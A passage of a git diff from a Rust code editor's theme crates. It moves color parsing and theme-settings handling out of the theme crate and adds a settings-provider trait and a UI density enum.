.terminal_ansi_dim_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_blue: this - .terminal_ansi_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_blue: this - .terminal_ansi_bright_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_blue: this - .terminal_ansi_dim_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_magenta: this - .terminal_ansi_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_magenta: this - .terminal_ansi_bright_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_magenta: this - .terminal_ansi_dim_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_cyan: this - .terminal_ansi_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_cyan: this - .terminal_ansi_bright_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_cyan: this - .terminal_ansi_dim_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_white: this - .terminal_ansi_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_white: this - .terminal_ansi_bright_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_white: this - .terminal_ansi_dim_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - link_text_hover: this - .link_text_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - version_control_added: this - .version_control_added - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `created`, for backwards compatibility. 
- .or(status_colors.created), - version_control_deleted: this - .version_control_deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `deleted`, for backwards compatibility. - .or(status_colors.deleted), - version_control_modified: this - .version_control_modified - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `modified`, for backwards compatibility. - .or(status_colors.modified), - version_control_renamed: this - .version_control_renamed - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `modified`, for backwards compatibility. - .or(status_colors.modified), - version_control_conflict: this - .version_control_conflict - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `ignored`, for backwards compatibility. - .or(status_colors.ignored), - version_control_ignored: this - .version_control_ignored - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `conflict`, for backwards compatibility. 
- .or(status_colors.ignored), - version_control_word_added: this - .version_control_word_added - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - version_control_word_deleted: this - .version_control_word_deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - #[allow(deprecated)] - version_control_conflict_marker_ours: this - .version_control_conflict_marker_ours - .as_ref() - .or(this.version_control_conflict_ours_background.as_ref()) - .and_then(|color| try_parse_color(color).ok()), - #[allow(deprecated)] - version_control_conflict_marker_theirs: this - .version_control_conflict_marker_theirs - .as_ref() - .or(this.version_control_conflict_theirs_background.as_ref()) - .and_then(|color| try_parse_color(color).ok()), - vim_normal_background: this - .vim_normal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_insert_background: this - .vim_insert_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_replace_background: this - .vim_replace_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_background: this - .vim_visual_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_line_background: this - .vim_visual_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_block_background: this - .vim_visual_block_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_yank_background: this - .vim_yank_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(editor_document_highlight_read_background), - vim_helix_normal_background: this - .vim_helix_normal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_select_background: this - .vim_helix_select_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_normal_foreground: this - .vim_normal_foreground - .as_ref() - .and_then(|color| 
try_parse_color(color).ok()), - vim_insert_foreground: this - .vim_insert_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_replace_foreground: this - .vim_replace_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_foreground: this - .vim_visual_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_line_foreground: this - .vim_visual_line_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_block_foreground: this - .vim_visual_block_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_normal_foreground: this - .vim_helix_normal_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_select_foreground: this - .vim_helix_select_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - } -} - -pub(crate) fn try_parse_color(color: &str) -> anyhow::Result { +/// Parses a color string into an [`Hsla`] value. +pub fn try_parse_color(color: &str) -> anyhow::Result { let rgba = gpui::Rgba::try_from(color)?; let rgba = palette::rgb::Srgba::from_components((rgba.r, rgba.g, rgba.b, rgba.a)); let hsla = palette::Hsla::from_color(rgba); diff --git a/crates/theme/src/styles/accents.rs b/crates/theme/src/styles/accents.rs index 7e42ffe2e5bfa6449a64203ffcd5e49720382d06..751a12849d62c3a08fc274b2ff2f12b0fa3280cc 100644 --- a/crates/theme/src/styles/accents.rs +++ b/crates/theme/src/styles/accents.rs @@ -5,7 +5,6 @@ use serde::Deserialize; use crate::{ amber, blue, cyan, gold, grass, indigo, iris, jade, lime, orange, pink, purple, tomato, - try_parse_color, }; /// A collection of colors that are used to color indent aware lines in the editor. @@ -66,25 +65,4 @@ impl AccentColors { pub fn color_for_index(&self, index: u32) -> Hsla { self.0[index as usize % self.0.len()] } - - /// Merges the given accent colors into this [`AccentColors`] instance. 
- pub fn merge(&mut self, accent_colors: &[settings::AccentContent]) { - if accent_colors.is_empty() { - return; - } - - let colors = accent_colors - .iter() - .filter_map(|accent_color| { - accent_color - .0 - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - }) - .collect::>(); - - if !colors.is_empty() { - self.0 = Arc::from(colors); - } - } } diff --git a/crates/theme/src/styles/players.rs b/crates/theme/src/styles/players.rs index 439dbdd437aa64e034004a4495e64a96e76ce87e..9699bf87a552e430a6bd6adb4ae8307228f35422 100644 --- a/crates/theme/src/styles/players.rs +++ b/crates/theme/src/styles/players.rs @@ -3,7 +3,7 @@ use gpui::Hsla; use serde::Deserialize; -use crate::{amber, blue, jade, lime, orange, pink, purple, red, try_parse_color}; +use crate::{amber, blue, jade, lime, orange, pink, purple, red}; #[derive(Debug, Clone, Copy, Deserialize, Default, PartialEq)] pub struct PlayerColor { @@ -148,40 +148,4 @@ impl PlayerColors { let len = self.0.len() - 1; self.0[(participant_index as usize % len) + 1] } - - /// Merges the given player colors into this [`PlayerColors`] instance. 
- pub fn merge(&mut self, user_player_colors: &[settings::PlayerColorContent]) { - if user_player_colors.is_empty() { - return; - } - - for (idx, player) in user_player_colors.iter().enumerate() { - let cursor = player - .cursor - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let background = player - .background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let selection = player - .selection - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - - if let Some(player_color) = self.0.get_mut(idx) { - *player_color = PlayerColor { - cursor: cursor.unwrap_or(player_color.cursor), - background: background.unwrap_or(player_color.background), - selection: selection.unwrap_or(player_color.selection), - }; - } else { - self.0.push(PlayerColor { - cursor: cursor.unwrap_or_default(), - background: background.unwrap_or_default(), - selection: selection.unwrap_or_default(), - }); - } - } - } } diff --git a/crates/theme/src/styles/syntax.rs b/crates/theme/src/styles/syntax.rs index 6a1615387835e0db1aefa03c63efd5c27ca2518d..b5c0a3016439e500c76e9b24775a137ddea7bbaa 100644 --- a/crates/theme/src/styles/syntax.rs +++ b/crates/theme/src/styles/syntax.rs @@ -1,203 +1 @@ -#![allow(missing_docs)] - -use std::sync::Arc; - -use gpui::{HighlightStyle, Hsla}; - -#[derive(Debug, PartialEq, Eq, Clone, Default)] -pub struct SyntaxTheme { - pub highlights: Vec<(String, HighlightStyle)>, -} - -impl SyntaxTheme { - #[cfg(any(test, feature = "test-support"))] - pub fn new_test(colors: impl IntoIterator) -> Self { - Self::new_test_styles(colors.into_iter().map(|(key, color)| { - ( - key, - HighlightStyle { - color: Some(color), - ..Default::default() - }, - ) - })) - } - - #[cfg(any(test, feature = "test-support"))] - pub fn new_test_styles( - colors: impl IntoIterator, - ) -> Self { - Self { - highlights: colors - .into_iter() - .map(|(key, style)| (key.to_owned(), style)) - .collect(), - } - } - - pub fn get(&self, name: &str) -> HighlightStyle { - 
self.highlights - .iter() - .find_map(|entry| if entry.0 == name { Some(entry.1) } else { None }) - .unwrap_or_default() - } - - pub fn get_opt(&self, name: &str) -> Option { - self.highlights - .iter() - .find_map(|entry| if entry.0 == name { Some(entry.1) } else { None }) - } - - pub fn color(&self, name: &str) -> Hsla { - self.get(name).color.unwrap_or_default() - } - - pub fn highlight_id(&self, name: &str) -> Option { - let ix = self.highlights.iter().position(|entry| entry.0 == name)?; - Some(ix as u32) - } - - /// Returns a new [`Arc`] with the given syntax styles merged in. - pub fn merge(base: Arc, user_syntax_styles: Vec<(String, HighlightStyle)>) -> Arc { - if user_syntax_styles.is_empty() { - return base; - } - - let mut merged_highlights = base.highlights.clone(); - - for (name, highlight) in user_syntax_styles { - if let Some((_, existing_highlight)) = merged_highlights - .iter_mut() - .find(|(existing_name, _)| existing_name == &name) - { - existing_highlight.color = highlight.color.or(existing_highlight.color); - existing_highlight.font_weight = - highlight.font_weight.or(existing_highlight.font_weight); - existing_highlight.font_style = - highlight.font_style.or(existing_highlight.font_style); - existing_highlight.background_color = highlight - .background_color - .or(existing_highlight.background_color); - existing_highlight.underline = highlight.underline.or(existing_highlight.underline); - existing_highlight.strikethrough = - highlight.strikethrough.or(existing_highlight.strikethrough); - existing_highlight.fade_out = highlight.fade_out.or(existing_highlight.fade_out); - } else { - merged_highlights.push((name, highlight)); - } - } - - Arc::new(Self { - highlights: merged_highlights, - }) - } -} - -#[cfg(test)] -mod tests { - use gpui::FontStyle; - - use super::*; - - #[test] - fn test_syntax_theme_merge() { - // Merging into an empty `SyntaxTheme` keeps all the user-defined styles. 
- let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([])), - vec![ - ( - "foo".to_string(), - HighlightStyle { - color: Some(gpui::red()), - ..Default::default() - }, - ), - ( - "foo.bar".to_string(), - HighlightStyle { - color: Some(gpui::green()), - ..Default::default() - }, - ), - ], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()) - ])) - ); - - // Merging empty user-defined styles keeps all the base styles. - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::blue()), - ("foo.bar", gpui::red()), - ])), - Vec::new(), - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::blue()), - ("foo.bar", gpui::red()) - ])) - ); - - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()), - ])), - vec![( - "foo.bar".to_string(), - HighlightStyle { - color: Some(gpui::yellow()), - ..Default::default() - }, - )], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::yellow()) - ])) - ); - - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()), - ])), - vec![( - "foo.bar".to_string(), - HighlightStyle { - font_style: Some(FontStyle::Italic), - ..Default::default() - }, - )], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test_styles([ - ( - "foo", - HighlightStyle { - color: Some(gpui::red()), - ..Default::default() - } - ), - ( - "foo.bar", - HighlightStyle { - color: Some(gpui::green()), - font_style: Some(FontStyle::Italic), - ..Default::default() - } - ) - ])) - ); - } -} +pub use syntax_theme::SyntaxTheme; diff --git a/crates/theme/src/theme.rs b/crates/theme/src/theme.rs index ca330beee3c9604278ce187e0609f60fbc58170e..faa18bd3ce9ed71f4afed6d21d577d48b14680fb 100644 --- 
a/crates/theme/src/theme.rs +++ b/crates/theme/src/theme.rs @@ -16,42 +16,34 @@ mod icon_theme_schema; mod registry; mod scale; mod schema; -mod settings; mod styles; +mod theme_settings_provider; +mod ui_density; -use std::path::Path; use std::sync::Arc; -use ::settings::DEFAULT_DARK_THEME; -use ::settings::IntoGpui; -use ::settings::Settings; -use ::settings::SettingsStore; -use anyhow::Result; -use fallback_themes::apply_status_color_defaults; -use fs::Fs; +use derive_more::{Deref, DerefMut}; use gpui::BorrowAppContext; use gpui::Global; use gpui::{ - App, AssetSource, HighlightStyle, Hsla, Pixels, Refineable, SharedString, WindowAppearance, - WindowBackgroundAppearance, px, + App, AssetSource, Hsla, Pixels, SharedString, WindowAppearance, WindowBackgroundAppearance, px, }; use serde::Deserialize; -use uuid::Uuid; pub use crate::default_colors::*; -use crate::fallback_themes::apply_theme_color_defaults; +pub use crate::fallback_themes::{apply_status_color_defaults, apply_theme_color_defaults}; pub use crate::font_family_cache::*; pub use crate::icon_theme::*; pub use crate::icon_theme_schema::*; pub use crate::registry::*; pub use crate::scale::*; pub use crate::schema::*; -pub use crate::settings::*; pub use crate::styles::*; -pub use ::settings::{ - FontStyleContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, - ThemeStyleContent, -}; +pub use crate::theme_settings_provider::*; +pub use crate::ui_density::*; + +/// The name of the default dark theme. +pub const DEFAULT_DARK_THEME: &str = "One Dark"; /// Defines window border radius for platforms that use client side decorations. pub const CLIENT_SIDE_DECORATION_ROUNDING: Pixels = px(10.0); @@ -86,15 +78,6 @@ impl From for Appearance { } } -impl From for ThemeAppearanceMode { - fn from(value: Appearance) -> Self { - match value { - Appearance::Light => Self::Light, - Appearance::Dark => Self::Dark, - } - } -} - /// Which themes should be loaded. This is used primarily for testing. 
pub enum LoadThemes { /// Only load the base theme. @@ -106,84 +89,31 @@ pub enum LoadThemes { All(Box), } -/// Initialize the theme system. +/// Initialize the theme system with default themes. +/// +/// This sets up the [`ThemeRegistry`], [`FontFamilyCache`], [`SystemAppearance`], +/// and [`GlobalTheme`] with the default dark theme. It does NOT load bundled +/// themes from JSON or integrate with settings — use `theme_settings::init` for that. pub fn init(themes_to_load: LoadThemes, cx: &mut App) { SystemAppearance::init(cx); - let (assets, load_user_themes) = match themes_to_load { - LoadThemes::JustBase => (Box::new(()) as Box, false), - LoadThemes::All(assets) => (assets, true), + let assets = match themes_to_load { + LoadThemes::JustBase => Box::new(()) as Box, + LoadThemes::All(assets) => assets, }; ThemeRegistry::set_global(assets, cx); - - if load_user_themes { - ThemeRegistry::global(cx).load_bundled_themes(); - } - FontFamilyCache::init_global(cx); - let theme = GlobalTheme::configured_theme(cx); - let icon_theme = GlobalTheme::configured_icon_theme(cx); + let themes = ThemeRegistry::default_global(cx); + let theme = themes.get(DEFAULT_DARK_THEME).unwrap_or_else(|_| { + themes + .list() + .into_iter() + .next() + .map(|m| themes.get(&m.name).unwrap()) + .unwrap() + }); + let icon_theme = themes.default_icon_theme().unwrap(); cx.set_global(GlobalTheme { theme, icon_theme }); - - let settings = ThemeSettings::get_global(cx); - - let mut prev_buffer_font_size_settings = settings.buffer_font_size_settings(); - let mut prev_ui_font_size_settings = settings.ui_font_size_settings(); - let mut prev_agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); - let mut prev_agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); - let mut prev_theme_name = settings.theme.name(SystemAppearance::global(cx).0); - let mut prev_icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); - let mut prev_theme_overrides = ( 
- settings.experimental_theme_overrides.clone(), - settings.theme_overrides.clone(), - ); - - cx.observe_global::(move |cx| { - let settings = ThemeSettings::get_global(cx); - - let buffer_font_size_settings = settings.buffer_font_size_settings(); - let ui_font_size_settings = settings.ui_font_size_settings(); - let agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); - let agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); - let theme_name = settings.theme.name(SystemAppearance::global(cx).0); - let icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); - let theme_overrides = ( - settings.experimental_theme_overrides.clone(), - settings.theme_overrides.clone(), - ); - - if buffer_font_size_settings != prev_buffer_font_size_settings { - prev_buffer_font_size_settings = buffer_font_size_settings; - reset_buffer_font_size(cx); - } - - if ui_font_size_settings != prev_ui_font_size_settings { - prev_ui_font_size_settings = ui_font_size_settings; - reset_ui_font_size(cx); - } - - if agent_ui_font_size_settings != prev_agent_ui_font_size_settings { - prev_agent_ui_font_size_settings = agent_ui_font_size_settings; - reset_agent_ui_font_size(cx); - } - - if agent_buffer_font_size_settings != prev_agent_buffer_font_size_settings { - prev_agent_buffer_font_size_settings = agent_buffer_font_size_settings; - reset_agent_buffer_font_size(cx); - } - - if theme_name != prev_theme_name || theme_overrides != prev_theme_overrides { - prev_theme_name = theme_name; - prev_theme_overrides = theme_overrides; - GlobalTheme::reload_theme(cx); - } - - if icon_theme_name != prev_icon_theme_name { - prev_icon_theme_name = icon_theme_name; - GlobalTheme::reload_icon_theme(cx); - } - }) - .detach(); } /// Implementing this trait allows accessing the active theme. @@ -198,6 +128,39 @@ impl ActiveTheme for App { } } +/// The appearance of the system. 
+#[derive(Debug, Clone, Copy, Deref)] +pub struct SystemAppearance(pub Appearance); + +impl Default for SystemAppearance { + fn default() -> Self { + Self(Appearance::Dark) + } +} + +#[derive(Deref, DerefMut, Default)] +struct GlobalSystemAppearance(SystemAppearance); + +impl Global for GlobalSystemAppearance {} + +impl SystemAppearance { + /// Initializes the [`SystemAppearance`] for the application. + pub fn init(cx: &mut App) { + *cx.default_global::() = + GlobalSystemAppearance(SystemAppearance(cx.window_appearance().into())); + } + + /// Returns the global [`SystemAppearance`]. + pub fn global(cx: &App) -> Self { + cx.global::().0 + } + + /// Returns a mutable reference to the global [`SystemAppearance`]. + pub fn global_mut(cx: &mut App) -> &mut Self { + cx.global_mut::() + } +} + /// A theme family is a grouping of themes under a single name. /// /// For example, the "One" theme family contains the "One Light" and "One Dark" themes. @@ -219,118 +182,6 @@ pub struct ThemeFamily { pub scales: ColorScales, } -impl ThemeFamily { - // This is on ThemeFamily because we will have variables here we will need - // in the future to resolve @references. - /// Refines ThemeContent into a theme, merging it's contents with the base theme. 
- pub fn refine_theme(&self, theme: &ThemeContent) -> Theme { - let appearance = match theme.appearance { - AppearanceContent::Light => Appearance::Light, - AppearanceContent::Dark => Appearance::Dark, - }; - - let mut refined_status_colors = match theme.appearance { - AppearanceContent::Light => StatusColors::light(), - AppearanceContent::Dark => StatusColors::dark(), - }; - let mut status_colors_refinement = status_colors_refinement(&theme.style.status); - apply_status_color_defaults(&mut status_colors_refinement); - refined_status_colors.refine(&status_colors_refinement); - - let mut refined_player_colors = match theme.appearance { - AppearanceContent::Light => PlayerColors::light(), - AppearanceContent::Dark => PlayerColors::dark(), - }; - refined_player_colors.merge(&theme.style.players); - - let mut refined_theme_colors = match theme.appearance { - AppearanceContent::Light => ThemeColors::light(), - AppearanceContent::Dark => ThemeColors::dark(), - }; - let mut theme_colors_refinement = - theme_colors_refinement(&theme.style.colors, &status_colors_refinement); - apply_theme_color_defaults(&mut theme_colors_refinement, &refined_player_colors); - refined_theme_colors.refine(&theme_colors_refinement); - - let mut refined_accent_colors = match theme.appearance { - AppearanceContent::Light => AccentColors::light(), - AppearanceContent::Dark => AccentColors::dark(), - }; - refined_accent_colors.merge(&theme.style.accents); - - let syntax_highlights = theme - .style - .syntax - .iter() - .map(|(syntax_token, highlight)| { - ( - syntax_token.clone(), - HighlightStyle { - color: highlight - .color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background_color: highlight - .background_color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - font_style: highlight.font_style.map(|s| s.into_gpui()), - font_weight: highlight.font_weight.map(|w| w.into_gpui()), - ..Default::default() - }, - ) - }) - .collect::>(); - let syntax_theme = 
SyntaxTheme::merge(Arc::new(SyntaxTheme::default()), syntax_highlights); - - let window_background_appearance = theme - .style - .window_background_appearance - .map(|w| w.into_gpui()) - .unwrap_or_default(); - - Theme { - id: uuid::Uuid::new_v4().to_string(), - name: theme.name.clone().into(), - appearance, - styles: ThemeStyles { - system: SystemColors::default(), - window_background_appearance, - accents: refined_accent_colors, - colors: refined_theme_colors, - status: refined_status_colors, - player: refined_player_colors, - syntax: syntax_theme, - }, - } - } -} - -/// Refines a [ThemeFamilyContent] and it's [ThemeContent]s into a [ThemeFamily]. -pub fn refine_theme_family(theme_family_content: ThemeFamilyContent) -> ThemeFamily { - let id = Uuid::new_v4().to_string(); - let name = theme_family_content.name.clone(); - let author = theme_family_content.author.clone(); - - let mut theme_family = ThemeFamily { - id, - name: name.into(), - author: author.into(), - themes: vec![], - scales: default_color_scales(), - }; - - let refined_themes = theme_family_content - .themes - .iter() - .map(|theme_content| theme_family.refine_theme(theme_content)) - .collect(); - - theme_family.themes = refined_themes; - - theme_family -} - /// A theme is the primary mechanism for defining the appearance of the UI. #[derive(Clone, Debug, PartialEq)] pub struct Theme { @@ -381,12 +232,6 @@ impl Theme { &self.styles.status } - /// Returns the color for the syntax node with the given name. - #[inline(always)] - pub fn syntax_color(&self, name: &str) -> Hsla { - self.syntax().color(name) - } - /// Returns the [`Appearance`] for the theme. #[inline(always)] pub fn appearance(&self) -> Appearance { @@ -416,40 +261,14 @@ impl Theme { } } -/// Asynchronously reads the user theme from the specified path. 
-pub async fn read_user_theme(theme_path: &Path, fs: Arc) -> Result { - let bytes = fs.load_bytes(theme_path).await?; - let theme_family: ThemeFamilyContent = serde_json_lenient::from_slice(&bytes)?; - - for theme in &theme_family.themes { - if theme - .style - .colors - .deprecated_scrollbar_thumb_background - .is_some() - { - log::warn!( - r#"Theme "{theme_name}" is using a deprecated style property: scrollbar_thumb.background. Use `scrollbar.thumb.background` instead."#, - theme_name = theme.name - ) - } - } - - Ok(theme_family) -} - -/// Asynchronously reads the icon theme from the specified path. -pub async fn read_icon_theme( - icon_theme_path: &Path, - fs: Arc, -) -> Result { - let bytes = fs.load_bytes(icon_theme_path).await?; - let icon_theme_family: IconThemeFamilyContent = serde_json_lenient::from_slice(&bytes)?; +/// Deserializes an icon theme from the given bytes. +pub fn deserialize_icon_theme(bytes: &[u8]) -> anyhow::Result { + let icon_theme_family: IconThemeFamilyContent = serde_json_lenient::from_slice(bytes)?; Ok(icon_theme_family) } -/// The active theme +/// The active theme. pub struct GlobalTheme { theme: Arc, icon_theme: Arc, @@ -457,72 +276,27 @@ pub struct GlobalTheme { impl Global for GlobalTheme {} impl GlobalTheme { - fn configured_theme(cx: &mut App) -> Arc { - let themes = ThemeRegistry::default_global(cx); - let theme_settings = ThemeSettings::get_global(cx); - let system_appearance = SystemAppearance::global(cx); - - let theme_name = theme_settings.theme.name(*system_appearance); - - let theme = match themes.get(&theme_name.0) { - Ok(theme) => theme, - Err(err) => { - if themes.extensions_loaded() { - log::error!("{err}"); - } - themes - .get(default_theme(*system_appearance)) - // fallback for tests. - .unwrap_or_else(|_| themes.get(DEFAULT_DARK_THEME).unwrap()) - } - }; - theme_settings.apply_theme_overrides(theme) + /// Creates a new [`GlobalTheme`] with the given theme and icon theme. 
+ pub fn new(theme: Arc, icon_theme: Arc) -> Self { + Self { theme, icon_theme } } - /// Reloads the current theme. - /// - /// Reads the [`ThemeSettings`] to know which theme should be loaded, - /// taking into account the current [`SystemAppearance`]. - pub fn reload_theme(cx: &mut App) { - let theme = Self::configured_theme(cx); + /// Updates the active theme. + pub fn update_theme(cx: &mut App, theme: Arc) { cx.update_global::(|this, _| this.theme = theme); - cx.refresh_windows(); - } - - fn configured_icon_theme(cx: &mut App) -> Arc { - let themes = ThemeRegistry::default_global(cx); - let theme_settings = ThemeSettings::get_global(cx); - let system_appearance = SystemAppearance::global(cx); - - let icon_theme_name = theme_settings.icon_theme.name(*system_appearance); - - match themes.get_icon_theme(&icon_theme_name.0) { - Ok(theme) => theme, - Err(err) => { - if themes.extensions_loaded() { - log::error!("{err}"); - } - themes.get_icon_theme(DEFAULT_ICON_THEME_NAME).unwrap() - } - } } - /// Reloads the current icon theme. - /// - /// Reads the [`ThemeSettings`] to know which icon theme should be loaded, - /// taking into account the current [`SystemAppearance`]. - pub fn reload_icon_theme(cx: &mut App) { - let icon_theme = Self::configured_icon_theme(cx); + /// Updates the active icon theme. + pub fn update_icon_theme(cx: &mut App, icon_theme: Arc) { cx.update_global::(|this, _| this.icon_theme = icon_theme); - cx.refresh_windows(); } - /// the active theme + /// Returns the active theme. pub fn theme(cx: &App) -> &Arc { &cx.global::().theme } - /// the active icon theme + /// Returns the active icon theme. 
pub fn icon_theme(cx: &App) -> &Arc { &cx.global::().icon_theme } diff --git a/crates/theme/src/theme_settings_provider.rs b/crates/theme/src/theme_settings_provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..f3e05bc77bdd91de46024951aa3bef1f01736502 --- /dev/null +++ b/crates/theme/src/theme_settings_provider.rs @@ -0,0 +1,43 @@ +use gpui::{App, Font, Global, Pixels}; + +use crate::UiDensity; + +/// Trait for providing theme-related settings (fonts, font sizes, UI density) +/// without coupling to the concrete settings infrastructure. +/// +/// A concrete implementation is registered as a global by the `theme_settings` crate. +pub trait ThemeSettingsProvider: Send + Sync + 'static { + /// Returns the font used for UI elements. + fn ui_font<'a>(&'a self, cx: &'a App) -> &'a Font; + + /// Returns the font used for buffers and the terminal. + fn buffer_font<'a>(&'a self, cx: &'a App) -> &'a Font; + + /// Returns the UI font size in pixels. + fn ui_font_size(&self, cx: &App) -> Pixels; + + /// Returns the buffer font size in pixels. + fn buffer_font_size(&self, cx: &App) -> Pixels; + + /// Returns the current UI density setting. + fn ui_density(&self, cx: &App) -> UiDensity; +} + +struct GlobalThemeSettingsProvider(Box); + +impl Global for GlobalThemeSettingsProvider {} + +/// Registers the global [`ThemeSettingsProvider`] implementation. +/// +/// This should be called during application initialization by the crate +/// that owns the concrete theme settings (e.g. `theme_settings`). +pub fn set_theme_settings_provider(provider: Box, cx: &mut App) { + cx.set_global(GlobalThemeSettingsProvider(provider)); +} + +/// Returns the global [`ThemeSettingsProvider`]. +/// +/// Panics if no provider has been registered via [`set_theme_settings_provider`]. 
+pub fn theme_settings(cx: &App) -> &dyn ThemeSettingsProvider { + &*cx.global::().0 +} diff --git a/crates/theme/src/ui_density.rs b/crates/theme/src/ui_density.rs new file mode 100644 index 0000000000000000000000000000000000000000..5510e330e55c5b63ca125ff3be9dad2f0357e5c2 --- /dev/null +++ b/crates/theme/src/ui_density.rs @@ -0,0 +1,65 @@ +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Specifies the density of the UI. +/// Note: This setting is still experimental. See [this tracking issue](https://github.com/zed-industries/zed/issues/18078) +#[derive( + Debug, + Default, + PartialEq, + Eq, + PartialOrd, + Ord, + Hash, + Clone, + Copy, + Serialize, + Deserialize, + JsonSchema, +)] +#[serde(rename_all = "snake_case")] +pub enum UiDensity { + /// A denser UI with tighter spacing and smaller elements. + #[serde(alias = "compact")] + Compact, + #[default] + #[serde(alias = "default")] + /// The default UI density. + Default, + #[serde(alias = "comfortable")] + /// A looser UI with more spacing and larger elements. + Comfortable, +} + +impl UiDensity { + /// The spacing ratio of a given density. 
+ /// TODO: Standardize usage throughout the app or remove + pub fn spacing_ratio(self) -> f32 { + match self { + UiDensity::Compact => 0.75, + UiDensity::Default => 1.0, + UiDensity::Comfortable => 1.25, + } + } +} + +impl From for UiDensity { + fn from(s: String) -> Self { + match s.as_str() { + "compact" => Self::Compact, + "default" => Self::Default, + "comfortable" => Self::Comfortable, + _ => Self::default(), + } + } +} + +impl From for String { + fn from(val: UiDensity) -> Self { + match val { + UiDensity::Compact => "compact".to_string(), + UiDensity::Default => "default".to_string(), + UiDensity::Comfortable => "comfortable".to_string(), + } + } +} diff --git a/crates/theme_extension/Cargo.toml b/crates/theme_extension/Cargo.toml index d94e15914b2dfbc8250641e8957366c27c2616a4..ca5b71de20b2166b81a14b79d81f581027245d6a 100644 --- a/crates/theme_extension/Cargo.toml +++ b/crates/theme_extension/Cargo.toml @@ -17,3 +17,4 @@ extension.workspace = true fs.workspace = true gpui.workspace = true theme.workspace = true +theme_settings.workspace = true diff --git a/crates/theme_extension/src/theme_extension.rs b/crates/theme_extension/src/theme_extension.rs index 10df2349c86decbadaa010778a95d04af36a6aab..85351a91f37a5b776b9db0f0bbbc4c05d3fc4616 100644 --- a/crates/theme_extension/src/theme_extension.rs +++ b/crates/theme_extension/src/theme_extension.rs @@ -5,7 +5,8 @@ use anyhow::Result; use extension::{ExtensionHostProxy, ExtensionThemeProxy}; use fs::Fs; use gpui::{App, BackgroundExecutor, SharedString, Task}; -use theme::{GlobalTheme, ThemeRegistry}; +use theme::{ThemeRegistry, deserialize_icon_theme}; +use theme_settings; pub fn init( extension_host_proxy: Arc, @@ -30,7 +31,8 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fn list_theme_names(&self, theme_path: PathBuf, fs: Arc) -> Task>> { self.executor.spawn(async move { - let themes = theme::read_user_theme(&theme_path, fs).await?; + let themes = + 
